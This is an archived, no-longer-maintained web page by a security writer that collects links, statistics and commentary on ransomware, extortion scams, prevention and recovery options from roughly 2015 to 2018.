Ransomware Resources

As I’m no longer regularly working in the security industry, this page is no longer being maintained. It’s left up here for historical reasons only.

David Harley, 15th April 2020

This is a general information resource: if your main interest is in recovering from and/or preventing an attack, you might want to go straight to the Ransomware Recovery and Prevention page.

I can’t help noticing that there’s much less detailed information about specific ransomware families these days, and I rarely see generic information with something new to say. That will inevitably impact on the currency of information on this resource, and how much priority I give it.

Breaking News

(Or stuff that doesn’t fit too easily into any of the categories below, so needs me to find time to add a category.) 

[29th October 2018]

Stephen Cobb for ESET: Ransomware and the enterprise: A new white paper
“Ransomware remains a serious threat and this new white paper explains what enterprises need to know, and do, to reduce risk”

[11th October 2018]

The recent (rescinded) Windows 10 upgrade – if you’ll pardon the expression – does seem to have attracted a load of scams as well as creating problems itself with profile corruption and deleted files and folders. Scams I’ve seen mentioned include ransomware masquerading as the upgrade installer [Microsoft doesn’t distribute upgrades – or links to upgrades – through email!], and tech support scammers offering ‘help’ with the upgrade (via phone calls or pop-ups). Here’s an example of the latter: Remove “Windows 10 Pro Update Failed” Fake Alerts (Microsoft Scam)

[10th October 2018]

Help Net, citing a report by Webroot: Cryptomining dethrones ransomware as top threat in 2018

[6th October 2018]

Pierluigi Paganini: Experts warns of a new extortion campaign based on the Breach Compilation archive – “Crooks attempted to monetize the availability of a huge quantity of credentials available in the underground market …. [using] the credentials collected in the infamous database dubbed ‘Breach Compilation’.”

[3rd October 2018]

Joseph Cox for Motherboard: Hackers Are Holding High Profile Instagram Accounts Hostage
Hackers have hijacked the accounts of at least four high profile Instagrammers recently, locking them out and demanding a bitcoin ransom.

[18th September 2018]

Mark Stockley for Sophos: The rise of targeted ransomware

“While cryptomining and cryptojacking have been sucking all the air out of the press room, a snowball that started rolling well before anyone had ever heard of WannaCry has been gathering pace and size.

The snowball is a trend for stealthier and more sophisticated ransomware attacks – attacks that are individually more lucrative, harder to stop and more devastating for their victims than attacks that rely on email or exploits to spread.”

[12th May 2018]

F-Secure: The Changing State of Ransomware

Help Net Security: Organisations across the UK are still struggling with ransomware

[25th April 2018]

Reuters: Ukrainian energy ministry website hit by ransomware attack

Graham Cluley: The firms that piggyback on ransomware attacks for profit “DON’T WANT TO PAY THE RANSOM? PAY US, AND WE’LL PAY IT FOR YOU! … It seems there are firms out there who are charging ransomware victims a hefty premium for the safe return of your data – when all that’s actually happening is they are paying the ransom on your behalf.”

Ross Ryan for the Prince Edward Island Guardian: P.E.I. government website hit by ransomware attack

[21st April 2018]

Help Net: Cryptominers displace ransomware as the number one threat. Summarizes a report from Comodo and also observes: “Another surprising finding: Altcoin Monero became the leading target for cryptominers’ malware, replacing Bitcoin.” Maybe not that surprising: see Cameron Camp’s article for ESET – Monero cryptocurrency: Malware’s rising star

[16th April 2018]

Researchers at Princeton: Machine Learning DDoS Detection for Consumer Internet of Things Devices. “…In this paper, we demonstrate that using IoT-specific network behaviors (e.g. limited number of endpoints and regular time intervals between packets) to inform feature selection can result in high accuracy DDoS detection in IoT network traffic with a variety of machine learning algorithms, including neural networks.” Commentary from Help Net: Real-time detection of consumer IoT devices participating in DDoS attacks

[20th March 2018]

If I had a separate category for ‘miscellaneous extortion’ this might belong there. Included here because it isn’t just a hoax, but one that centres on extortion, though it looks as if the point is to embarrass/harass the apparent sender of the extortion email (the Michigan company VELT)  rather than actually make a direct profit from extortion. The company’s CEO told the BBC that the attacker was probably a Minecraft player who had been banned from using the Veltpvp server, by way of revenge.

The BBC: School bomb threats: Disgruntled Minecraft gamer ‘behind hoax’

The Guardian: School bomb threats: more than 400 schools in England receive hoax warnings “Police say threats contained in emails are not credible and evacuations are unnecessary.”

The Telegraph: Hackers target more than 400 schools with  bomb hoax.

[8th March 2018]

An article on ransomware I  contributed to ESET’s Trends 2018 report has been republished as a blog article on WeLiveSecurity. Trends 2018: The ransomware revolution

[8th February 2018]

Catalin Cimpanu for Bleeping Computer: Researcher Bypasses Windows Controlled Folder Access Anti-Ransomware Protection

Cimpanu observes:

The user must manually approve any app that’s allowed to edit files located in CFA folders by adding each app’s executable to a whitelist…But Yago Jesus, a Spanish security researcher with SecurityByDefault, has discovered that Microsoft has automatically whitelisted all Office apps on this list.

In SecurityByDefault’s article, Jesus states that:

…an attacker could perform a Ransomware attack bypassing Windows Defender protection activating the native encryption feature of Microsoft Office.

——————————————————————-

Iain Thompson for The Register: Good news, everyone: Ransomware declining. Bad news: Miscreants are turning to crypto-mining on infected PCs – Screw asking for digi-coins. Craft ’em on 500,000 computers

If a regular timeline is of use to you, David Balaban contacted me about his Ransomware Chronicle, which tersely flags ‘New ransomware released’, ‘Old ransomware updated’, ‘Ransomware decrypted’ and ‘Other important events’. No links to further information, though, which limits its usefulness. Apparently he also provides ransomware reports for Tripwire’s State of Security blog. He told me that he intends to add links (but that doesn’t seem to have happened to date [February 2018] so I’m not holding my breath). Some of the other material on that web site may be of use to you, though, so I’m leaving the links here for the moment.

Index

Yes, I know it’s a bit weird to have the Index as the 2nd item and including the index. I still have to find time to organize this better while making it as easy as possible to update.

Sorry, not yet live links, as I may well reorganize the page sooner rather than later. However, I wanted to get this thing Out There in some form and time has been a problem.

Introduction

Ransomware is hardly a new issue – in fact, my own first engagement with the wacky world of malware was with the ‘AIDS Trojan’, sometimes cited as the first ransomware, at the end of the 1980s – but the impact of the ransomware problem seems to have increased dramatically in the past few months, so I though perhaps it was time to set up a page somewhat along the lines of AVIEN’stech support scams page.

4th/5th April 2018

[1st March 2018]

Malwarebytes: Encryption 101: ShiOne ransomware case study. Practical part of a series that started with Encryption 101: a malware analyst’s primer. Best to read the primer first.

[14th December 2017]

ESET’s report Cybersecurity Trends 2018: The Cost Of Our Connected World may be of particular relevance on this site, in that it includes my article ‘The ransomware revolution’.

——–

As reported by Help Net Bitdefender suggests that:

  • 54% of all malware targeting the UK is ransomware
  • For the US the figure is 61.8%
  • The Cryptowall gang extorted more than $325m from victims in the US alone.

On 26th January 2016, Foursys published the results of its cybersecurity survey: IT Security Survey Results: “Cybersecurity in 2016 and beyond”. Questions were posed to more than 400 organizations in the UK, from SMEs to major corporates and public sector organizations. Somewhat alarmingly, of the 15.8% of respondents who admitted to a security breach event in 2015 (a further 15.8% declined to disclose),  41.9% of respondents said they’d suffered a ransomware breach, which is why I’m mentioning it here.The overall results of the survey are summarized in infographic form here.

Here are some resources that people who’ve only just come across ransomware (and are not unsurprisingly alarmed about it) may find useful.

The first sections include some basic information on the ransomware problem, and links to further information.

Basic Information

Added July 25th 2017:

SecurityWeek contributor Kevin Townsend asked me about a report from the UK’s De Montfort University on the psychology of ransomware splash screens. Here’s the article he published – Researcher Analyzes Psychology of Ransomware Splash Screens – and here are some further thoughts from me published on the ESET blog: Social engineering and ransomware.

Added articles to this site on July 4th 2017:

AV-Test Report: malware/threat statistics

AV-Test offers an interesting aggregation of 2016/2017 malware statistics in its Security Report here. Its observations on ransomware may be of particular interest to readers of this blog (how are you both?) The reports points out that:

There is no indication based on proliferation statistics that 2016 was also the “year of ransomware“. Comprising not even 1% of the overall share of malware for Windows, the blackmail Trojans appear to be more of a marginal phenomenon.

But as John Leyden remarks for The Register:

The mode of action and damage created by file-encrypting trojans makes them a much greater threat than implied by a consideration of the numbers…

Looking at the growth in malware for specific platforms, AV-Test notes a decrease in numbers for malware attacking Windows users. (Security vendors needn’t worry: there’s still plenty to go round…)

On the other hand, the report says of macOS malware that ‘With an increase rate of over 370% compared to the previous year, it is no exaggeration to speak of explosive growth.’ Of Android, it says that ‘the number of new threats … has doubled compared to the previous year.’

Of course, there’s much more in this 24-page report. To give you some idea of what, here’s the ToC:

  • The AV-TEST Security Report 2
  • WINDOWS Security Status 5
  • macOS Security Status 10
  • ANDROID Security Status 13
  • INTERNET THREATS Security Status 16
  • IoT Security Status 19
  • Test Statistics 22

Windows 10 Controlled folder access

[25th October 2017]

Help Net Security: Is the Windows 10 controlled folder access anti-ransomware feature any good?

[Added 23rd October 2017: Catalin Cimpanu for Bleeping Computer: Microsoft’s Windows 10 Anti-Ransomware Feature Is Now Live ]

Microsoft describes the new Windows 10 feature ‘Controlled folder access in Windows Defender Antivirus’ in the article Announcing Windows 10 Insider Preview Build 16232 for PC + Build 15228 for Mobile. The article specifically mentions ransomware as one of the threats against which it is likely to be effective.

The article states that ‘Controlled folder access monitors the changes that apps make to files in certain protected folders. If an app attempts to make a change to these files, and the app is blacklisted by the feature, you’ll get a notification about the attempt. You can complement the protected folders with additional locations, and add the apps that you want to allow access to those folders.’

It’s not clear what criteria are used to blacklist an application: as I read it, it may simply use Windows Defender’s scanning engine to determine the status of an app. I guess I’ll wait for more information before deciding how much additional protection this really provides.

Zeljka Zorz comments for Help Net Security :

Whether this security feature will be enough to stop ransomware remains to be seen, especially if ransomware can get a whitelisted application to bypass the protection and offer a way in.

I wasn’t really thinking of this in terms of whitelisting until I read that, but the feature does, in fact, allow the user to add protected locations apart from the default folders, and also to ‘ Allow an app through Controlled folder access’.  Which opens the door to social engineering as well as subversion of apps, but then that’s a persistent issue with whitelisting applications.

[11th November 2016]

Everything you need to know about ransomware by John Snow, for Kaspersky.  I think the title is a bit hyperbolic, but it could be a useful introduction.

[19th October 2016]

Malwarebytes CEO Marcin Kleczynski is heavily quoted by Steve Melendez in an article suggesting an ever-increasing correlation between tech support scams using malware and unequivocal ransomware: Tech Support Scams Are Getting More Sophisticated

[3rd August 2016]

The latest SANS ‘Ouch!’ newsletter is dedicated to a description of ransomware and tips on how to counter it.  And no, I have no idea why they chose the name Ouch!

Like other editions, this particular newsletter issue is presumably aimed primarily at home users rather than corporates. (Though it does include a link to the SANS Advanced Cybersecurity Learning Platform.) At any rate, it’s fairly simplistic. However, it’s accurate enough (though I’d take issue with the fact that it seems to suggest that cloud-based backups are safe from ransomware, which isn’t always true).

Anyway, anything that might help raise awareness and understanding of the issue among the general population is worth publicizing.

[12th May 2016]

I haven’t checked out Troy Hunt’s Introduction to Ransomware video for Varonis yet myself. If I can find time to, I’ll report back here. But I’d be surprised if it turned out to be useless. 🙂 Itis apparently free, and you can watch three of the eight lessons before deciding whether to register.

Unit 42’s document Unlocking the lucrative criminal business model is a reasonable overview of the ransomware issue generally. Palo Alto’s Ryan Olson announced it here: Ransomware Is Not a “Malware Problem” – It’s a Criminal Business Model. OK, but actually most malware nowadays conforms to a business model…

What is Ransomware?

Here’s a succinct definition from ESET. Other brands and definitions are available. 🙂 However, my close association with the company means that I can lay hands quite quickly on information it provides, so I’m not embarrassed to use it. I will, of course, try to include useful information from any source, including ESET’s direct competitors.

A particular kind of malicious software used for extortion. When activated, ransomware prevents access to a device or the data on it until the victim pays a fee.

Wikipedia’s definition, though hardly comprehensive, is close enough, and more expansive than the VirusRadar glossary definition. In particular, it makes clearer the fact that there is a difference between encrypting and non-encrypting (locking) ransomware.

Here’s an excellent definition by Martin Overton: his presentation here makes very useful reading.

Ransomware is a type of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator(s) of the malware in order for the restriction to be removed. Some forms of ransomware encrypt files on the system’s hard drive (cryptoviral extortion, a threat originally envisioned by Adam Young and Moti Yung), while some may simply lock the system and display messages intended to coax the user into paying.

The Cryptoviral FAQ, as a matter of interest, is here.

From an article for IT Security UK on 15th December 2015: ‘Perhaps Information Security (the magazine and the industry) is on safer ground when it refers to more specific trends (as flagged by McAfee). Perhaps the most interesting (if disquieting) from my point of view is the assertion that ransomware ‘…grew 155% year-on-year thanks to the ready availability of low-cost ‘ransomware-as-a-service’ tools on the darknet.’

Refers to this article in Infosecurity Magazine.

[5th June 2016]

Tom Spring for Kaspersky ThreatPost: RESEARCHERS UNCOVER AFFILIATE NETWORK FOR RANSOMWARE. Refers to two reports by Flashpoint on ransomware in Russia: Ransomware as a Service: Inside an Organized Russian Ransomware Campaign and Hacking Healthcare: Cybercriminals Find Value in Holding Data Hostage As Alternative to Putting it Up For Sale.

Product Testing

[5th August 2016]

Testing lab SE Labs has been testing anti-malware programs in order to evaluate their effectiveness against ransomware: Anti-malware vs. ransomware: latest reports

There are reports covering products intended for large businesses/enterprises, small-to-medium businesses, and home users/consumers. I haven’t looked at them in detail yet, but I expect them to be up to Simon Edwards’ usual high standards.

[This item also posted to the Anti-Malware Testing blog.]

Encrypting versus Non-Encrypting Ransomware

The essential difference between the two is that crypto ransomware (ransomware that encrypts files is often known as a filecoder) uses some form of encryption to scramble data. The idea is that the data becomes inaccessible to the victim until he or she pays the extortionist to allow them to decrypt (unlock) their data. Malware authors have not always been associated with efficient encryption, but nowadays there is often no simple way to retrieve encrypted files without paying the extortionist. (Who may or may not, of course, help you decrypt them even when you’ve paid.) And if ever I heard an argument for a good backup strategy…

Other forms of ransomware don’t necessarily (directly) involve encryption, but are nevertheless intended to block the victim’s access to their device or data, or at least to persuade the victim that access is blocked. Sometimes, the blocking is easily bypassed. Sometimes it isn’t there at all, but involves a fake pop-up along the same lines as those used by some tech support scammers. We don’t include tech support scams in the ransomware category, but both types of attack involve getting money from victims for fixing (sometimes) issues that were caused or fabricated by the criminal. Sometimes, however, tech support scams and ransomware are more or less directly related. 

Delilah: Ransomware and Recruitment

When Chuck Berry recorded ‘Beautiful Delilah’ back in the 1950s, he wasn’t thinking of anything like the Trojan described by Diskin, according to Gartner’s Avivah Litan, as gathering ‘enough personal information from the victim so that the individual can later be manipulated or extorted.’ By which the company seems to include recruitment of insiders by forcing them to leak data.

The article concludes:

Insider threats are continuing to increase with active recruitment of insiders from organized criminals operating on the dark web.

Commentary by Darren Pauli for The Register: Extortion trojan watches until crims find you doing something dodgy – And then the extortion starts and you’re asked to steal critical data

[Added 22nd July 2016]

Useful resources from F-Secure:

Commentary by The Register: Ransomware gang: How can I extort you today? Step 1. Improve customer service. Step 2.???? Step 3 PROFIT!!!

Doxing and Extortion

Here’s a slightly different twist on extortion that doesn’t involve ransomware. Steve Ragan describes for CSO Salted Hash how a Website offers Doxing-as-a-Service and customized extortion. The subtitle explains the business model:

Those posting Dox will get a commission, or they can pay to have someone’s personal details exposed

The amount of commission depends on the type of Doxing. In ascending order of payment:

  • Miscellaneous
  • Revenge
  • Paedophiles [the American spelling is used by the site: Cymmetria’s Nitsan Saddan is quoted as believing that it’s likely that ‘these are American players.’]
  • Law enforcement
  • Famous

The DaaS-tardly doxing service is priced according to the type of information collected, from the barest details to a complete profile. Ragan observes that the service doesn’t seem to be collecting customers – at any rate:

…the Bitcoin wallet used to process payments for this service has received no transactions.

And he has seen little traction on the site since he’s been monitoring it. Nevertheless, he predicts that this kind of activity will become more common.

[5th June 2016]

Not ransomware, but related in that it clearly involves extortion/blackmail: the FBI has issued an alert about Extortion E-Mail Schemes Tied To Recent High-Profile Data Breaches. The threatening messages arrive in the wake of a flood of revelations of high-profile data thefts. The ready availability of stolen credentials is used by crooks to convince victims that they have information that will be released to friends ‘and family members (and perhaps even your employers too)’ unless a payment of 2-5 bitcoins is received.

The generic nature of some of the messages quoted by the FBI doesn’t suggest that the scammer has any real knowledge of the targets or of information that relates to them.

‘If you think this amount is too high, consider how expensive a divorce lawyer is. If you are already divorced then…’

This sounds more like mass mail-outs in the hope that some will reach a target sufficiently guilt-ridden to pay up just in case. Other messages may well frighten some people, fearful of being ‘doxed’, into paying up in case their personally-identifiable information falls into the wrong hands.

What can I do about it?

[5th August 2016]

Paul Ducklin describes in some detail the rising tide of ransomware arriving by email attachment in the form of a .LNK file, and how this bit of trickery works: Beware of ransomware hiding in shortcuts. It’s by no means a new approach to distributing malware, but evidently still successful, not least because ‘LNK files don’t follow the View file name extensions setting in File Explorer, and … they can show up with an icon that is at odds with their real behaviour…’

Fortunately, Paul includes a series of useful tips that mitigate your exposure to this particular malicious behaviour although it doesn’t block it completely. Including this one:

  • Never open LNK files that arrive by email. We can’t think of any situation in which you would need, or even want, to use a LNK file that came via email. The name and icon will probably be misleading, so keep your eyes peeled for the tiny arrow that Windows shows at the bottom left of the icon.”

As true now as it was years ago…

[4th August 2016] Further to the Europol initiative I allude to below, Kevin Townsend followed up in a story here: 40 Percent of Companies Will Pay the Ransom. I’m quoted in the article, but I’m in the process of writing a follow-up article of my own which I’ll flag here when it’s published.

26th July 2016

Europol, the European Union’s law enforcement agency, has announced an initiative to address the ransomware issue. (Hat Tip to Kevin Townsend, who first brought it to my attention.)

The agency’s announcement tells us that:

No More Ransom(www.nomoreransom.org) is a new online portal aimed at informing the public about the dangers of ransomware and helping victims to recover their data without having to pay ransom to the cybercriminals…

…The project has been envisioned as a non-commercial initiative aimed at bringing public and private institutions under the same umbrella. Due to the changing nature of ransomware, with cybercriminals developing new variants on a regular basis, this portal is open to new partners’ cooperation.

The site includes:

  • Crypto Sheriff – a form for helping victims try to find out which malware they’re affected by and whether a decrypter is available. Sounds like a potentially useful resource, even though the little graphic reminds me a little of the late, lamented Lemmy rather than a hi-tech search facility. Somewhat similar to MalwareHunter’s ID Ransomware facility.
  • A Ransomware Q&A page
  • Prevention Advice
  • An About page
  • Advice on how to Report a Crime
  • And a limited range of decryption tools from Kaspersky (mostly) and Intel.

Infosecurity Magazine’s commentary notes that:

‘In its initial stage, the portal contains four decryption tools for different types of malware, including for CoinVault and the Shade Trojan. In May, ESET claimed that it had contacted TeslaCrypt’s authors after spotting a message announcing they were closing their ‘project’ and offered a decryption key.

‘Raj Samani, EMEA CTO for Intel Security, told Infosecurity that both Intel Security and Kaspersky had developed decryption tools to apply against Teslacrypt, and these will be posted to the website shortly.

Well, I’m not in a position to compare the effectiveness of various TeslaCrypt decrypters, and I do understand that it’s important for the “The update process for the decryption tools page …[to]… be rigorous.” And the AVIEN site is certainly not here to pursue ESET’s claim to a portion of the PR pie. Still, there are decrypters around from a variety of resources apart from the companies already mentioned (see Bleeping Computer’s articles for examples). I hope other companies and researchers working in this area will throw their hats into the ring in response to Europol’s somewhat muted appeal for more partnerships, so that the site benefits from a wider spread of technical expertise and avoids some of the pitfalls sometimes associated with cooperative resources. As it states on the portal:

“the more parties supporting this project the better the results can be, this initiative is open to other public and private parties”.

12th July 2016

Researchers from the University of Florida and Villanova University suggest that ransomware can be mitigated by detecting its encrypting files early in the process:

CryptoLock (and Drop It): Stopping Ransomware Attacks on User Data

A good idea, but some anti-malware programs already do something like this (i.e. flag programs that start encrypting files in bulk). But still a good idea. At The Register, Richard Chirgwin offers a round of applause:

Florida U boffins think they’ve defeated all – ransomware Crypto Drop looks for tell-tale signs that files are being encrypted

22nd June 2016

An article on Help Net suggests that businesses may be putting too much faith in their backup processes. I’m not sure how likely that is. Most businesses would not pay in the event of a ransomware attack. Stats come from IDT11, apparently, but I didn’t find the source material.

8th June 2016:

Ransomware Tracker offers various types of blocklists that allows you to block Ransomware botnet C&C traffic.’ I haven’t looked at it, but may be useful.

[2nd June 2016]: Phishme reports that 93% of phishing emails contain encryption ransomware.

  • If there’s anyone out there who still thinks it can’t happen to them, think again. Of course you can lessen the risk by using common sense and good computer hygiene, not opening dubious attachments and visiting dubious sites, and using security software.
  • [14th April 2016] A few times I’ve seen it suggested that encryption of valuable data before ransomware strikes will somehow protect it against ransomware. Today I came across the same assertion again on Spiceworks, apparently suggested to a Spiceworks subscriber by a lecturer. Not a lecturer in IT security, I hope…I guess whether there’s any truth in the assertion depends on what you understand by encryption.
    • If files can be modified they can be encrypted: ransomware doesn’t check to see if a file is encrypted and throw its hands up in despair if it is, it simply adds another layer of encryption.
    • If the media on which the files reside can’t be accessed without a password then presumably the files themselves can’t be modified while the media are inaccessible.
    • However, if the media are accessible and write-enabled because the files are in use, the chances are that ransomware will be able to encrypt the files, irrespective of whether they are already somehow encrypted by the legitimate owner or user of the aforementioned files.

Much the same considerations apply to  backups, of course. If the backup media are accessible while the ransomware delivers its unpleasant payload, there’s a ‘good’ chance that the backed up files will also be encrypted.

[This article – Mac OS X ransomware: How KeRanger is a shadow of malware to come – The design of KeRanger demonstrates how attackers plan to make it even harder for victims of ransomware not to pay up – includes an interesting if confusing/confused comment from Timothy Wallach of the FBI:

“The best prevention for ransomware is to have thorough backups that are off the network, as well as encrypting your own data. That way if the bad guys encrypt it with their ransomware you still have it…”

It would be interesting to know if that’s exactly what Wallach said, since I’d rather like to know what he meant by ‘encrypting your own data’.]

  • Back up your data to an external device. And to cloud services as well, if you like. Bear in mind, though, that if your data is backed up somewhere that’s ‘always on’ while you’re using your computer, there’s a risk that ransomware (or other malicious software) might be able to encrypt, delete or corrupt your backed-up data too. In Ransomware a Threat to Cloud Services, Too Brian Krebs notes an instance where, when one of Children in Film’s employees opened an attachment passed off as an invoice: within 30 minutes, over 4,000 files on a cloud server, mounted as a local drive, had been encrypted by Teslacrypt. Fortunately, according to Krebs, the cloud hosting company kept daily backups and the company was able to use BleepingComputer’s TeslaDecoder to decrypt the files without paying the extortionists, but the inconvenience was still significant. But it’s not just a matter of how effective your defences are. Quocirca’s Bob Tarzey suggests for Infosecurity Magazine that Dropbox’s versioning (and indeed Google’s) offers some mitigation to ransomware even where it encrypts content backed up to the cloud: Your Money or Your Data? Mitigating Ransomware with Dropbox
  • Netskope report on Cloud issues notes cases where, when a victim’s cloud-hosted files are encrypted, cloud service users synching to the same folder found their files being encrypted too, even though they weren’t themselves directly compromised by the ransomware. While Netskipe’s Jamie Barnett told SC Magazine that “It was a blinding flash of the obvious for us,”  it’s obviously a finding that more Cloud users need to take into account. It’s important to realize that if you share storage with others, their susceptibility to ransomware may become your problem too.
  • The Register reports that a CSA (Cloud Security Alliance) poll found that:
    • Some respondents would pay very large sums to extortionists to avoid data dumps
    • That gambling sites continue to be targeted with threats of DDoS attacks, often coinciding with major sporting events
    • That “… even police and law enforcement agencies [are] recommending organisations hit by the most water-tight ransomware encryption attacks to pay up to get their decryption keys.”

The article also suggests a link between the Hidden Tear open source code and the not-very-successful Linux.Encoder. Here’s an article from Computer World that makes a similar connection.

  • For the same reason, don’t try to reinstall backed-up files from an off-line resource (at any rate, a write-enabled offline resource) until you’re sure the malware is no longer present and active on your system. Aryeh Goretsky’s paper on Options for backing up your computer is a good starting point if you need more information on backing up your data.
  • Using security software to remove the ransomware doesn’t usually restore the encrypted files. Unfortunately, removing the malware while they’re still encrypted may make it impossible to restore them even by paying the ransom. Maybe you should look on a ransomware attack as the universe’s way of telling you to use anti-malware, but before you install it or update what protection you have, you might want to make sure that your files are restorable (or restored and safe from further damage), if they aren’t already safely backed up. Or bite the bullet and accept that they’re gone. Corporate systems administrators often simply nuke the system and reinstall everything.
  • Yes, I provide consultancy to the security industry, so you’d expect me to advocate security software, but I happen to think it’s foolhardy not to use it. I have nearly thirty years’ experience in security, but I certainly wouldn’t want to be without it. Which doesn’t mean that I think:
    • “All you need is anti-virus software.” Not true, and hasn’t been for years, though anti-virus – even free anti-virus – is better than no protection at all. At the very least the average user needs the sort of security suite that security companies who used to sell just AV would much rather sell you.
    • “Security software will protect you from ransomware (and everything else).” Not (altogether) true either. Even basic anti-virus will protect against more than the ‘anti-virus is dead’ crowd (mostly purveyors of other security solutions) would like you to think, but that doesn’t mean you can click on anything. Your first (or last) line of defence is your own common sense.
  • Not all ransomware uses unbreakable encryption. If you’re using anti-malware (I’d say ‘and you should be’ but someone always says ‘well, you would say that…’) check with the company’s helpline: they may be able to help, even if they didn’t detect the malware in the first place. Unfortunately, if you’re using free AV, you’ll probably find you’re restricted to a support forum, and the advice may be variable in quality. Yeah, I know. I would say that…
  • Security bloggers almost invariably advise you not to pay the ransom. Easy to say, when it’s not your own data that’s at stake, but an ounce of prevention (and backup) is worth a ton of Bitcoins, and doesn’t encourage the criminals to keep working on their unpleasant technologies and approaches to social engineering. Sometimes, paying the ransom doesn’t get the data back, though. Worth remembering if you’re inclined to accept the FBI’s advice to just pay up. But Virus Bulletin has an article ‘ Paying a malware ransom is bad, but telling people to never do it is unhelpful advice‘ and I was pretty much in agreement here: Never Pay the Ransom – Good Advice? Ryan Naraine softens slightly on the ‘never pay the ransom’ stance in How to avoid becoming the next victim of ransomware, which basically acknowledges that some institutions have real difficulty in resourcing the sort of security that defeats ransomware. On the other hand, we hear of instances where organizations pay ransomware even though they have backups, because it’s the cheaper option. I understand the economic argument, but every time a ransom is paid, it compounds the problem by encouraging the crooks.It’s also worth remembering that law enforcement is liable to advocate the path of least resistance because agencies don’t have the resources to investigate every scam or malware attack involving fairly small sums.[And the Register reports: Senate asks DHS: you don’t negotiate with terrorists, but do you pay off ransomware? – Committee asks for full details on government’s handling of extortionist malware]

(I expanded some of the content above in an article for ESET, sparked off by a conversation with Kevin Townsend, in the wake of research commissioned by Malwarebytes, on the pros and cons of paying to get your data back after a ransomware attack. Read more here: Ransomware: To pay or not to pay?)

While a Bitdefender survey finds that:

  • 50% of users can’t accurately identify ransomware as a type of threat that prevents or limits access to computer data.
  • Half of victims are willing to pay up to $500 to recover encrypted data.
  • Personal documents rank first among user priorities.
  • UK consumers would pay most to retrieve files
  • US users are the main target for ransomware.
    SC Magazine’s take on the topic tells us that 44% of ransomware victims in the UK have paid to recover their data

A survey by Kaspersky also offers a fairly downbeat assessment of how well the population in general understands ransomware: Consumers have no idea what ransomware is.

Happy endings aren’t nearly as common as I’d wish in the world of ransomware, but David Balaban’s guest blog article for Tripwire offers a few instances where decryption didn’t mean paying a ransom:

Ransomware Happy Ending: 10 Known Decryption Cases

He cites several instances of specific ransomware, but the fact that free decryption was available in some cases at the time of that article doesn’t mean that current attacks are still remediable. Almost by definition, if you’ve just been hit by ransomware, it probably wasn’t one of these, or else you’ve been attacked by an ‘improved’ version. But it’s still worth checking whether an up-to-date decryption tool is available.

  • Locker
  • Torlocker
  • Teslacrypt
  • helpme@freespeechmail.org
  • Coinvault and Bitcryptor
  • Linux.encoder.1
  • Cryptolocker
  • Cryptinfinite
  • Radamant
  • Cryptolocker2015

Unfortunately, recovery tools are rarely forever, and often the scammer wises up and fixes the holes in his code. So there are many cases where paying up is the only way to get your data back, if you don’t have backups. But before you do pay up, consider Balaban’s advice and ‘describe your problem on computer help forums like Bleeping Computer orMalwarebytes.’ Or, of course, contact the company that makes your security software.

[Emsisoft recently published an interview with Lawrence of Bleeping Computer – Behind the scenes of a free PC troubleshooting helpsite: Interview with BleepingComputer – that you might find of interest, as it specifically includes references to ransomware.]

Don’t just assume that the scammers are evil geniuses who can’t be beaten.

More information from ESET:

Advice from other security vendors and other organizations is available. 🙂

11th April 2016: generalist/predictive article by Cisco/Talos. RANSOMWARE: PAST, PRESENT, AND FUTURE. From the introduction: “In this blog post we explore traits of highly effective strains of self-propagating malware of the past, as well as advances in tools to facilitate lateral movement. This research is important as we expect adversaries to begin utilizing these capabilities in ransomware going forward.” Commentary by David Bisson for Graham Cluley’s blog [12th April 2016]: Are cryptoworms the future of ransomware?Security researcher paints a gloomy outlook

Graham Cluley for Hot for Security: Malicious scripts spammed out to infect computers with ransomware

A new paper from Mandiant covers a lot of ground, including data on bulk export of PII (Personally Identifiable Information) and the exploitation of network devices as well as some interesting data and speculation about ransomware.

Commentary from Darren Pauli for The Register here.

Here are a couple of resources for businesses wondering how to set about protecting themselves from ransomware.

Writing for Bitdefender, Graham Cluley offers The Simple Way to Stop your Business from Being Extorted by Ransomware, instead of simply waiting till you get hit and have to cave in to the extortionist’s demands. His top tips will go a long way towards protecting companies, but many of them also apply to individuals. They will, of course, also help protect against other kinds of malware (and frankly, people and companies should routinely be taking precautions like these already).

Kaspersky offers a Practical Guide: Could your business survive a cryptor? I can’t comment on how good it is, since it’s accessed via a contact form that requires information I’m not prepared to give since I don’t want sales calls.

Adam Alessandrini’s Ransomware Hostage Rescue Manual. There’s also a link to the same document (plus a ‘Ransomware Attack Response Checklist and Ransomware Prevention Checklist’ in this (quite useful) article: [ALERT] 2016 Is A Ransomware Horror Show. Here Is The New Roundup! I haven’t checked that link or the additional material since it requires registration, but the manual itself is worth a look.

A useful paper from Anan Ajjand for Sophos: Ransomware: Next-Generation Fake Antivirus

A technically not-very-sound article from the BBC on The computer virus that blackmails you. It would be nice if a ‘technology reporter’ knew better than to describe all malware as ‘a virus’, and ransom isn’t the same as blackmail, though I suppose both are extortion. Still, I suppose anything that raises awareness of the problem is at least partially helpful. And while it’s not always the case that files can only be recovered from a backup version, it’s good to reinforce the idea that backups are a Good Thing.

Here’s a general article on ransomware from David Bisson that might be more useful.

Paul Ducklin has a good article on Got ransomware? What are your options?

He includes sections on:

  • Shortcuts to recovery
  • Longcuts to recovery
  • Cracking the encryption

And those cover most of the recovery options, which is what most people will probably want to know. Unfortunately, those options aren’t always there, hence the downbeat tone of the ‘What to do’ section:

What we are saying is that if you really need your files back, and you haven’t taken any precautions such as backing up, then you don’t really have any choice but to pay.

We’d rather you didn’t pay up, but if you do, we understand and respect your choice. (It’s easy to be high and mighty when it’s not your data on the line!)

I’m afraid I’m totally in agreement with that. However, he does follow up with a list of ‘useful ransomware precautions’, and we can never make too many of those recommendations either. This is certainly a case where prevention is a much better option than cure. In brief, his recommendations include, if I can summarize:

  • Good backup strategy
  • Disable macros
  • Consider viewer apps
  • Distrust attachments
  • Don’t routine run with admin privileges
  • ‘Patch early, patch often’

Here are a couple of ‘what you need to know’ articles on ransomware. At some point I might come back to make a few comments about individual points, but in general, if you’re still puzzled as to what it’s all about, you might find some useful thoughts here.

And here’s an interesting article from Bob Covello on The new economics of data protection in a world of ransomware. The core message of Covello’s article is simple enough. Even the most expensive backup and cloning options he cites look much more attractive than paying an estimated $5,000 in the hope of having the 7ev3n gang restore your data. I do have a few caveats though, as I explained in an article Unlucky 7ev3n: greedy ransomware and how to avoid it.

TechTarget’s Kathleen Richards surveys the ransomware scene and suggests that Even with rise in crypto-ransomware, majority do not pay.

Here’s a wide-ranging paper from Bitdefender on ‘Ransomware, a Victim’s Perspective: a Study on US and European Internet Users‘. Well worth a look.

And here’s a paper from Symantec on ‘The Evolution of Ransomware‘.

Sophos: 8 tips for preventing ransomware

US/Canada alert/info:

